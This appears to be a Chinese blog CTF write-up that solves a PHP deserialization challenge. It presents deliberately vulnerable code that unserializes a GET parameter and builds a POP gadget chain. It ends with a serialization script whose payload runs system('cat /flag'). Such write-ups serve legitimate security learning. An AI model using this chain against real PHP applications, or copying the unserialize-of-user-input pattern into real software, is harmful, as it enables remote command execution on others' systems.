CTF之旅WEB篇(3)--ezunser PHP反序列化

最新推荐文章于 2024-05-12 21:22:49 发布
最新推荐文章于 2024-05-12 21:22:49 发布
阅读量1.3k 收藏 12
点赞数 5
分类专栏: CTF 文章标签: php 其他 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shutTD/article/details/127138584
版权

一、审题

对方朝你扔过来一串代码(当然这次又是蹭的题只说过程和思路):

<?php
highlight_file(__FILE__);
class A{
    public $name;
    public $age;

    public function __destruct(){
        call_user_func($this->age,'');
    }
}

class AAA{
    public $debug;

    public function __invoke(){

        echo $this->debug;
    }
    public function __toString(){
        return $this->debug;
    }
}



class B{

    public $func;
    public $arg;
    public function backdoor(){
        call_user_func($this->func,$this->arg."");
    }


}

class BBB{
    public $kkk;
    public $lll;
    public function __toString(){
        $this->kkk->backdoor();
        return "ok";
    }

}

if(isset($_GET['a'])){
    unserialize($_GET['a']);
}

好的,一眼又是我们的php反序列化,开审之前我们先复习复习我们的php中的魔术方法,建议先去看一遍我先前的一篇文章:

shutTD的CTF之旅WEB篇(2)--NewStarCTF 公开赛UnserializeOne详解_shutTD的博客-CSDN博客

好的复习完成,我们继续我们的反序列化,首先第一步找出我们的目标函数,也就是这个 call_user_func()函数,这个函数可以执行任意代码,详情使用的方法建议直接去查,在这我们的最终目的就是要执行到call_user_func('system','cat /flag') (至于为什么直接执行cat /flag,问就是经验哈哈,不过还是可以通过ls等命令查看找出flag的位置)

 二、找到反序列化入口,从入口延申向下

在A类中发现__destruct(),所以这就是我们的入口,因此我们第一步实例化一个A的对象:

$res = new A();

跟进__destruct():

  public function __destruct(){
        call_user_func($this->age,'');
    }

call_user_func($this->age,'')即执行age类的某个方法,所以我们很自然的想到__invoke()方法,所以我们在AAA类中发现该方法,因此我们的第二步就是:

$res->age = new AAA();

跟进__invoke():

public function __invoke(){

        echo $this->debug;
    }

看到echo我们直接想到能够触发__toString()方法,所以我们在BBB类中发现有__toString()方法,因此我们第三步就是:

$res->age->debug = new BBB();

跟进__toString():

public function __toString(){
        $this->kkk->backdoor();
        return "ok";
    }

发现调用了kkk属性的backdoor()方法,我们搜索一下哪个类中有此方法,在B类中我们发现此方法且刚好我们的目标函数就在这其中,马上就快到终点了,所以我们第四步就是:

$res->age->debug->kkk = new B();

三、调整思路,编写脚本

因为我们需要达到call_user_func('system','cat /flag'),所以我们的类B中属性应为:

class B{

    public $func = 'system';
    public $arg = 'cat /flag';
    public function backdoor(){
        call_user_func($this->func,$this->arg."");
    }


}

好的大功告成,开始编写脚本:

<?php
class A{
    public $name;
    public $age;
}

class AAA{
    public $debug;
}



class B{

    public $func='system';
    public $arg='cat /flag';
}

class BBB{
    public $kkk;
    public $lll;
}
$res=new A();
$res->age=new AAA();
$res->age->debug=new BBB();
$res->age->debug->kkk=new B();
echo serialize($res);

直接参数a等于序列化字符get提交即可获取flag啦!

四、总结

总的来说这道题思路还是很清晰的,是算偏易的题了不过新手拿来练手还是可以的逻辑很清晰,建议看完这篇文章后自己再试着做一遍哦!

shutTD
关注
  • 5
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF-Web-Challenge:使用PHPWeb中进行CTF挑战
03-25
在这个"CTF-Web-Challenge"中,你将有机会学习和实践如何在Web环境中识别和利用漏洞。 PHP是一种广泛使用的服务器端脚本语言,特别适合开发动态网站。在CTF挑战中,你可能会遇到的PHP相关知识点包括: 1. **PHP...
NSS [UUCTF 2022 新生赛]ez_unser
Jay17的博客
07-04 770
NSS [UUCTF 2022 新生赛]ez_unser
[UUCTF 2022]ez_user
ShangYaoPaiGu的博客
12-07 272
进入环境,获得源码: 审计源码,为php序列这里首先想到的是利用CVE-2016-7124,后面发现不成功,看了下题目的环境:题目为,而该漏洞利用的条件是那只能换一种思路。题目中php函数的触发顺序为: 变量在wakeup中被置空了,所以在中想要执行提前构造好的a,只能利用 这条语句,也就是将和“链接”起来: 这样在被设置为空字符串之后,通过重新赋予我们构造好的命令进行执行。构造代码如下: 传入参数a= 得到: flag文件为fffffffffflagafag所以最终exp为: payload:
[UUCTF 2022 新生赛]ez_unser
最新发布
wangzhemvp的博客
05-12 226
正常序列出来是O:4:"test":3:{s:1:"a";preg_match('/test":3/i',$a)) 序列里面要有 "test":3 ,但又要绕过__wakeup(),这显然冲突了。把a的地址给到b,然后在把正确的内容给到c,因为$this->b=$this->c。改不了变量属性,$a肯定会被' '覆盖,那怎么办呢?
php序列序列学习与实践
不想当脚本小子的脚本小子
01-20 190
序列序列: 在PHP中,序列用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构。序列最重要的作用:在传递和保存对象时.保证对象的完整性和可传递性。对象转换为有序字节流,以便在网络上传输或者保存在本地文件中。序列的最重要的作用:根据字节流中保存的对象状态及描述信息,通过序列重建对象。 总结:核心作用就是对象状态的保存和重建。(整个过程核心点就是字节流中所保存的对象状态及描述信息) 本质上讲,序列就是把实体对象状态按照一定的格式写入到有序字节流,序列就是从有序字节流重建对
2022 UUCTF Web
weixin_63231007的博客
12-19 2275
2022UUCTF web部分赛题分析
【网络安全 | CTF】攻防世界 Web_php_unserialize 解题详析
等风来
05-28 3658
这段代码接收参数 var,使用 base64_decode 函数对 var 进行解码,然后通过 preg_match 函数判断是否包含类似 o:2的字符串,如果存在则中断程序执行,否则调用 @unserialize 函数进行序列操作。这段代码首先定义了一个名为 Demo 的类,包含了一个私有变量 $file 和三个魔术方法 __construct()、__destruct() 和 __wakeup()。3、private在变量名前添加标记\00(classname)\00,长度+2+类名长度,如。
NSSCTF web刷题
akxnxbshai的博客
08-15 3288
闲来无聊写一写NSSCTF
php代码-ctf payload 第九题 序列 do you know robot
07-15
CTF(Capture The Flag)竞赛中,编程者经常面临各种挑战,其中“序列”是一种常见的安全漏洞利用方式。第九题的标题暗示我们需要理解并利用PHP序列机制来解决这个问题。PHP是一种广泛使用的服务器端...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP序列安全漏洞与防御... 6 - Python 安全开发基础...
ctf-all-in-one
01-30
ctf-all-in-one
bfengj#CTF#thinkphp5.0.24序列rce1
07-25
thinkphp5.0.24序列rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
web-ctf-help:脚本集,以帮助基于Webctfs
02-24
Web-CTF-帮助描述一组简单的脚本(目前主要为抓取器),旨在帮助Web CTF。 查找图像源(和替代项),JavaScript源和注释。用法usage: webctf [-h] [-v] [--comments] [--scripts] [--images] [--headers] [--cookies...
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出题人申请重新对过渡进行修改发布的权利,但对每个题均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 对已提供Dockerfile...
php序列长度变尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
3. 设计序列字符串,使得在序列时触发这些异常行为。 4. 通过登录功能注入精心构造的序列字符串。 5. 观察或利用序列过程中的副作用,如执行恶意代码或修改内部状态。 在0CTF-2016-piapiapia挑战中,...
ctfweb攻防工具-御剑1.5.7z
04-06
【御剑】是一款知名的Web安全扫描工具,常用于CTF(Capture The Flag)竞赛和网络安全检测。CTF是一种信息安全竞赛,参与者通过展示攻击与防御技术来争夺“旗标”,即获取或保护特定的信息资源。在这样的竞赛中,Web...
[SWPUCTF 2022 新生赛]ez_ez_unserialize
2301_80553405的博客
02-12 629
创造类x,定义了一个魔术常量x为_FILE_,有定义了几个函数,construct函数让x类中的常量x赋值,wakeup让x重新赋值为_FULE_,destruct函数高亮x常量,如果传参x存在序列,否则输出。修改为O:1:"X":2:{s:1:"x";看到提示flag在fllllllag.php中,将代码复制,删掉没有的,加上x序列。由于要绕过wakeup函数,只要序列的中的成员数大于实际成员数,即可绕过。打开后是段php代码。
2021-10-3 安全笔记周报(php 序列的两道例题)(待更新)
m0_54481455的博客
10-03 4610
Moectf2021 easyunserialize <?php classentrance { public$start; function__construct($start) { $this->start=$start; } function__destruct() { $this->start->helloworld(); } } c...
CTFSHOW卷王杯 easy unserialize
Landasika的博客
05-17 1288
<?php include("./HappyYear.php"); class one { public $object; public function MeMeMe() { array_walk($this, function($fn, $prev){ if ($fn[0] === "Happy_func" &&am...
CTF Web题理论基础篇-第二课:工具集与php弱类型
在《002-CTF web题理论基础篇-第二课理论基础.pdf》和《002-CTF web题理论基础篇-第二课理论基础》中,我们学习了关于CTF网页题型的理论基础知识。本文总结了这些知识,并提供了一些相关的工具集和理论基础内容。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shutTD

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值